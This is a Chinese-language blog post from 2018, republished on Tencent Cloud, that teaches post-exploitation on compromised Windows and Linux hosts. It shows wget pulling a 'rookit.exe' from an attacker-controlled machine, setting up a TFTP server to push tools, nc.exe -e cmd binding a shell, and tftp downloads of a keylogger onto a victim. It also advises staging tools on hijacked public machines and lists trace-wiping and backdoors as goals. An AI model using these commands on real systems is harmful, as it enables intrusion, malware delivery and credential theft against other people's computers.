专栏首页漫流砂后渗透阶段开始

后渗透阶段开始

经过之前的步骤,我们应该已经可以发现主机的漏洞,并且获取到一定的权限

下面就进入了后渗透测试阶段

在后渗透测试阶段我们主要的目标就是上传工具,权限提升,擦除攻击痕迹,安装持久化后门

以上的每一个步骤都至关重要!

上传工具


可能此时我们通过一个REC漏洞获取了一个shell,不过仅仅一个shell的功能是有限的,为了扩大战果,我们需要上传更为有力的工具,比如mimikatz,wce,为以后的攻击做准备

这里我们针对的系统主要是Windows和 Linux

在Linux上我们可以使用nc, curl, wget,这些在很多Linux发行版本中都是默认安装的,用来远程从我们的肉鸡上下载一个tool简直不能再方便了

wget http://123.123.34.3/rookit.exe

最简单的使用方法

所以我们接下来讲述的主要针对Windows

在Kali的 /usr/share/windows-binaries/ 文件夹下有一些Windows上常用的一些工具,比如键盘记录,whoami等

1.TFTP


TFTP是基于UDP协议的一个协议,与FTP协议类似,都可以提供文件传输

我们没有首先采用FTP协议来进行远程下载工具就是因为FTP需要交互输入密码,有时候我们获取到的shell并非交互的,所以很难实现

TFTP 是不需要身份验证的,也就是说服务器上有文件直接下载就行

TFTP 在XP和Win2003系统中是自动安装的,win2003还是有很大一部分服务器在使用的,所以我就以2003来进行演示

这个是安装win2003的截图,很熟悉的界面,上一次安装好想还是我在弄第一期培训

客户端安装完成后我们开始配置我们的TFTP服务器端,我们用Kali就可以完成这个服务器的假设

在假设服务器之前我们应该明确一点,我们的服务器不能被反黑掉,所以在权限控制和访问控制方面需要做一下限定

1. 新建一个目录

mkdir ~/tftp

2. 修改权限为nobody,这是一个未登录的权限,权限只能用来下载

chown –R nobody ~/tftp

3. 将我们需要传递的工具复制到目录中

cp /usr/share/windows-binaries/whoami.exe ~/tftp

4. 开启服务

atftpd --daemon --port 69 ~/tftp

--deamon 以后台形式启动

--port 端口是69

5. 检测服务是否成功开启

netstat –pantu | grep 69

#### 这里有一个问题,我必须强调一下

此处指定的路径必须是绝对路径,我在上面执行指定的是一个相对路径,这样会导致后续下载不到文件

所以上面应该变为

atftpd --daemon --port 69 /root/Desktop/tftp/

我们就用nc来在window2003上模拟一个非交互性的shell

nc.exe –lp 9999 –e cmd

遗憾的是我发现,在win2003r2 版本中并没有默认安装tftp

当我想要看看win2003版本时候发现没有可用的密钥,所以我就用一台XP来进行演示

nc.exe –lp 9999 –e cmd

这边我们用Kali的nc去连接一下,模拟出一个远程shell

我们在shell中执行

tftp -i 192.168.123.53 get whoami.exe

-i 二进制格式

tftp -i 192.168.123.53 get klogger.exe

可以看到已经下载成功了,之后我们执行一下看看效果吧

以上只是一个简单的小例子,通常来说我们应该把我们的程序放在公网上的一台肉鸡中,在攻击之前在肉鸡上开启服务,下载之后关闭。

更多方法敬请期待!

-END-

本文分享自微信公众号 - 漫流砂(yidalidemao)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-07-06

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • dash & rbash & nc.openbsd ​| Linux 后门系列

    今天在查找资料的时候在一篇文章中发现了 dash 和 nc.openbsd 这两个命令,dash、rbash、nc.openbsd 和 nc.tradition...

    意大利的猫
  • Kali系列--网络军刀NC!

    Netcat is a featured networking utility which reads and writes data across netwo...

    意大利的猫
  • 初识弱点扫描

    这个数据库是OffensiveSecurity 维护的,收集了大量的意已知漏洞的PoC 和 Exp,也是我们查找漏洞利用代码的主要途径之一

    意大利的猫
  • ​Arm机移植算法与程序

    应项目需求,测试多路摄像头,需要测试程序移植到Arm机上,比如写的人脸识别算法,视频多拍等,那如何进行移植,如何操作呢,本篇文章进行详细阐述。

    公众号guangcity
  • Tomcat爆出严重漏洞,影响所有版本,波及约8万台服务器,附解决方案!(扩散!!!)

    2月20日,CNVD(国家信息安全漏洞共享平台)公告知名Web应用服务器Apache Tomcat被爆存在文件包含漏洞,攻击者可在受影响的Apache Tomc...

    黄泽杰
  • AdaBoost详解

    对于一个复杂任务,将多个决策进行适当的综合所得出的判断,要比其中任何一个决策更为准确.

    JNJYan
  • Python基础学习篇——Global全局变量的使用

    为了测试Python中全局变量的使用,我们试图撰写以下几个例子进行说明: #第一例子,是用来验证一个最基础的全局变量与局部变量的区别,内容如下: #-*- c...

    bear_fish
  • 【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告

    2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏...

    绿盟科技安全情报
  • 暑期追剧学AI | 油管网红带你搞定机器学习中数学思维(一)

    大数据文摘
  • CVE-2019-0232-ApacheTomca远程执行代码漏洞复现

    2019年4月13号,Apache Tomcat 9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。

    墙角睡大觉

扫码关注云+社区

领取腾讯云代金券